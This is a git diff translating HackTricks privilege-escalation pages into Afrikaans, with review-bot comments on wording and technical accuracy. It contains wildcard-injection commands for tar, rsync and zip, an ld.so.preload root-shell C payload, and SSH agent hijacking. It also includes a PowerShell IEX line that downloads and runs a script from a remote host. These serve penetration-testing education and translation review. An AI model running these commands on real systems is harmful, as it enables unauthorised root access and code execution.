[https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** -The **CVE-2023-46214** allowed to upload an arbitrary script to **`$SPLUNK_HOME/bin/scripts`** and then explained that using the search query **`|runshellscript script_name.sh`** it was possible to **execute** the **script** stored in there. +Die **CVE-2023-46214** het dit moontlik gemaak om 'n willekeurige skripsie na **`$SPLUNK_HOME/bin/scripts`** te laai en het toe verduidelik dat dit moontlik was om die skripsie wat daar gestoor is, uit te voer deur die soekvraag **`|runshellscript script_name.sh`** te gebruik.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
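Review bot: several terms in the translated body change the meaning or are not Afrikaans: "skul" for shell (keep `shell`, or use "dop"), "Uitbuiting van Exploit" for "Exploit Execution" (should be "Uitvoering van die exploit"), "Misbruik van Splunk-aanvragen" uses the Dutch "aanvragen" (use "Splunk-soektogte" or "-navrae"), and "skripsie" means a thesis, not a script (use "skrip"). Independently of the translation, the hunk carries over an inconsistency from the source that is worth fixing here: the intro says Splunk is running on "poort 8090" while the exploit line uses `--port 8089`. 8089 is the splunkd management port that PySplunkWhisperer2 talks to, so the prose should say 8089 in both languages.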
diff --git a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index 5e1a783b1..0754279b4 100644 --- a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -1,61 +1,53 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-# Summary - -What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: +# Opsomming +Wat kan jy doen as jy binne die `/etc/ssh_config` of binne `$HOME/.ssh/config`-konfigurasie hierdie ontdek: ``` ForwardAgent yes ``` +As jy root binne die masjien is, kan jy waarskynlik **toegang verkry tot enige ssh-verbinding wat deur enige agent gemaak is** wat jy in die _/tmp_ gids kan vind. -If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory - -Impersonate Bob using one of Bob's ssh-agent: - +Impersonateer Bob deur een van Bob se ssh-agente te gebruik: ```bash SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston ``` +## Hoekom werk dit? -## Why does this work? +Wanneer jy die veranderlike `SSH_AUTH_SOCK` stel, het jy toegang tot die sleutels van Bob wat gebruik is in Bob se ssh-verbinding. As sy privaat sleutel nog daar is (normaalweg sal dit wees), sal jy in staat wees om enige gasheer daarmee te benader. -When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it. +Aangesien die privaat sleutel in die geheue van die agent onversleutel is, vermoed ek dat as jy Bob is maar nie die wagwoord van die privaat sleutel weet nie, kan jy steeds toegang tot die agent verkry en dit gebruik. -As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it. +'n Ander opsie is dat die gebruiker wat eienaar is van die agent en root moontlik toegang tot die geheue van die agent kan verkry en die privaat sleutel kan onttrek. 
-Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. +# Lang verduideliking en uitbuiting -# Long explanation and exploitation - -**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)** +**Kyk na die [oorspronklike navorsing hier](https://www.clockwork.com/insights/ssh-agent-hijacking/)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
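Review bot: "Impersonateer Bob" is an anglicism; the Afrikaans is "Doen jou voor as Bob" (or "Neem Bob se identiteit aan"), and "onversleutel" should be "ongeënkripteer". Moving `+As jy root binne die masjien is...` above its `-` counterpart is fine, but the translation also deletes the blank lines that separated the prose from the ```bash fences; GitBook renders either way, yet a translation commit should not change layout. Also worth correcting in both old and new text: the client configuration file is `/etc/ssh/ssh_config`, not `/etc/ssh_config`, and `ForwardAgent yes` is a setting on Bob's client. The `/tmp/ssh-haqzR16816/agent.16816` socket is created by sshd on the server Bob connected to, so the machine where root can hijack the agent is that server, not Bob's workstation; one sentence saying so would make the attack position clear to the reader.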
- - diff --git a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index ab67eeb19..d3a698ce8 100644 --- a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,104 +1,85 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## chown, chmod -You can **indicate which file owner and permissions you want to copy for the rest of the files** - +Jy kan **aandui watter lêiereienaar en toestemmings jy wil kopieer vir die res van die lêers** ```bash touch "--reference=/my/own/path/filename" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(gekombineerde aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Tar -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Rsync -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash Interesting rsync option from manual: - -e, --rsh=COMMAND specify the remote shell to use - --rsync-path=PROGRAM specify the rsync to run on remote machine +-e, --rsh=COMMAND specify the remote shell to use +--rsync-path=PROGRAM specify the rsync to run on remote machine ``` ```bash touch "-e sh shell.sh" ``` - -You can exploit this using 
[https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(_rsync _attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(rsync-aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## 7z -In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root: - +In **7z** kan jy selfs deur `--` voor `*` te gebruik (let daarop dat `--` beteken dat die volgende inset nie as parameters behandel kan word nie, so net lêernaamspaaie in hierdie geval) 'n willekeurige fout veroorsaak om 'n lêer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word: ```bash 7za a /backup/$filename.zip -t7z -snl -p$pass -- * ``` - -And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read: - +En jy kan lêers in die gids waar dit uitgevoer word, skep. Jy kan die lêer `@root.txt` en die lêer `root.txt` skep as 'n **symlink** na die lêer wat jy wil lees: ```bash cd /path/to/7z/acting/folder touch @root.txt ln -s /file/you/want/to/read root.txt ``` +Dan, wanneer **7z** uitgevoer word, sal dit `root.txt` behandel as 'n lêer wat die lys van lêers bevat wat dit moet komprimeer (dit is wat die bestaan van `@root.txt` aandui) en wanneer 7z `root.txt` lees, sal dit `/file/you/want/to/read` lees en **aangesien die inhoud van hierdie lêer nie 'n lys van lêers is nie, sal dit 'n fout veroorsaak** wat die inhoud wys. 
-Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. - -_More info in Write-ups of the box CTF from HackTheBox._ +_Meer inligting in Write-ups van die boks CTF van HackTheBox._ ## Zip -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash zip name.zip files -T --unzip-command "sh -c whoami" ``` - - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
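Review bot: the rsync manual excerpt loses its leading whitespace in the `+` lines (`+-e, --rsh=COMMAND specify the remote shell to use` and `+--rsync-path=PROGRAM specify the rsync to run on remote machine`); it is a verbatim quote from `rsync --help`, so keep the indented form of the removed lines. Typo: "lêiereienaar" should be "lêereienaar". In the 7z section, "'n willekeurige fout veroorsaak om 'n lêer te lees" renders the English word for word and obscures the point; say that the error message 7z prints discloses the contents of the file the symlink points to, which is what the following paragraph about `@root.txt` and `root.txt` then explains. The fix for the original "_(_rsync _attack)_" markup is a good catch.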
- - diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md index 6088d573f..be4f800e3 100644 --- a/linux-hardening/privilege-escalation/write-to-root.md +++ b/linux-hardening/privilege-escalation/write-to-root.md @@ -1,46 +1,44 @@ -# Arbitrary File Write to Root +# Willekeurige Lêer Skryf na Root
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
### /etc/ld.so.preload -This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\ -If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary. - -For example: `echo "/tmp/pe.so" > /etc/ld.so.preload` +Hierdie lêer gedra soos die **`LD_PRELOAD`** omgewingsveranderlike, maar dit werk ook in **SUID-binêre lêers**.\ +As jy dit kan skep of wysig, kan jy net 'n **pad na 'n biblioteek wat gelaai sal word** by elke uitgevoerde binêre lêer toevoeg. +Byvoorbeeld: `echo "/tmp/pe.so" > /etc/ld.so.preload` ```c #include #include #include void _init() { - unlink("/etc/ld.so.preload"); - setgid(0); - setuid(0); - system("/bin/bash"); +unlink("/etc/ld.so.preload"); +setgid(0); +setuid(0); +system("/bin/bash"); } //cd /tmp //gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` +### Git-aanslae -### Git hooks +[**Git-aanslae**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) is **skripte** wat **uitgevoer** word by verskeie **gebeure** in 'n git-opberging, soos wanneer 'n toewysing geskep word, 'n saamvoeging plaasvind... As 'n **bevoorregte skrip of gebruiker** hierdie aksies gereeld uitvoer en dit moontlik is om in die `.git`-opvouer te **skryf**, kan dit gebruik word vir **privilege-escalation**. -[**Git hooks**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are **scripts** that are **run** on various **events** in a git repository like when a commit is created, a merge... So if a **privileged script or user** is performing this actions frequently and it's possible to **write in the `.git` folder**, this can be used to **privesc**. 
- -For example, It's possible to **generate a script** in a git repo in **`.git/hooks`** so it's always executed when a new commit is created: +Byvoorbeeld, dit is moontlik om 'n skrip te **genereer** in 'n git-opberging in die **`.git/hooks`**-opvouer sodat dit altyd uitgevoer word wanneer 'n nuwe toewysing geskep word: {% code overflow="wrap" %} ```bash @@ -51,14 +49,14 @@ chmod +x pre-commit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
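Review bot: in the first hunk (`@@ -1,46`), "Git-aanslae" mistranslates "Git hooks": "aanslae" means attacks or assessments, so the heading and the linked sentence now read as "Git attacks". Keep `Git hooks` as the feature name (it is what the linked git-scm page calls them) or use "Git-hake". In the same paragraph "toewysing" (allocation) is used for commit, "opberging" for repository and "opvouer" for folder; the usual Afrikaans is "commit" left untranslated, "bewaarplek" or "repo", and "gids". The C listing for `/etc/ld.so.preload` also lost the indentation inside `_init()` (`+unlink("/etc/ld.so.preload");` and the three lines after it); it still compiles, but code blocks should be left untouched in translation commits.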
diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md index af9cb8722..348751841 100644 --- a/linux-hardening/useful-linux-commands/README.md +++ b/linux-hardening/useful-linux-commands/README.md @@ -1,29 +1,27 @@ -# Useful Linux Commands +# Nuttige Linux-opdragte
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## Common Bash - +## Algemene Bash ```bash #Exfiltration using Base64 base64 -w 0 file @@ -75,7 +73,7 @@ unzip file.zip sudo apt-get install xz-utils; unxz file.xz #Add new user -useradd -p 'openssl passwd -1 ' hacker +useradd -p 'openssl passwd -1 ' hacker #Clipboard xclip -sel c < cat file.txt @@ -142,21 +140,18 @@ sudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip 7z l file.zip ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Bash for Windows - +## Bash vir Windows ```bash #Base64 for Windows echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 - + #Exe compression upx -9 nc.exe 
@@ -165,16 +160,141 @@ wine exe2bat.exe nc.exe nc.txt #Compile Windows python exploit to exe pip install pyinstaller -wget -O exploit.py http://www.exploit-db.com/download/31853 +wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py #Compile for windows #sudo apt-get install gcc-mingw-w64-i686 i686-mingw32msvc-gcc -o executable useradd.c ``` - ## Greps +Grep is a powerful command-line tool used for searching and filtering text. It allows you to search for specific patterns or strings within files or output. Here are some useful grep commands: + +### Basic Grep + +The basic syntax for using grep is as follows: + +```bash +grep [options] pattern [file...] +``` + +- `pattern` is the string or regular expression you want to search for. +- `file` is the file or files you want to search within. If no file is specified, grep will search from standard input. + +### Searching for a Pattern in a File + +To search for a pattern in a specific file, use the following command: + +```bash +grep pattern file +``` + +For example, to search for the word "password" in the file `example.txt`, you would use: + +```bash +grep password example.txt +``` + +### Searching for a Pattern in Multiple Files + +To search for a pattern in multiple files, use the following command: + +```bash +grep pattern file1 file2 file3 +``` + +For example, to search for the word "password" in the files `file1.txt`, `file2.txt`, and `file3.txt`, you would use: + +```bash +grep password file1.txt file2.txt file3.txt +``` + +### Searching for a Pattern in a Directory + +To search for a pattern in all files within a directory, use the following command: + +```bash +grep pattern directory/* +``` + +For example, to search for the word "password" in all files within the `documents` directory, you would use: + +```bash +grep password documents/* +``` + +### Ignoring Case Sensitivity + +By default, grep is case-sensitive. 
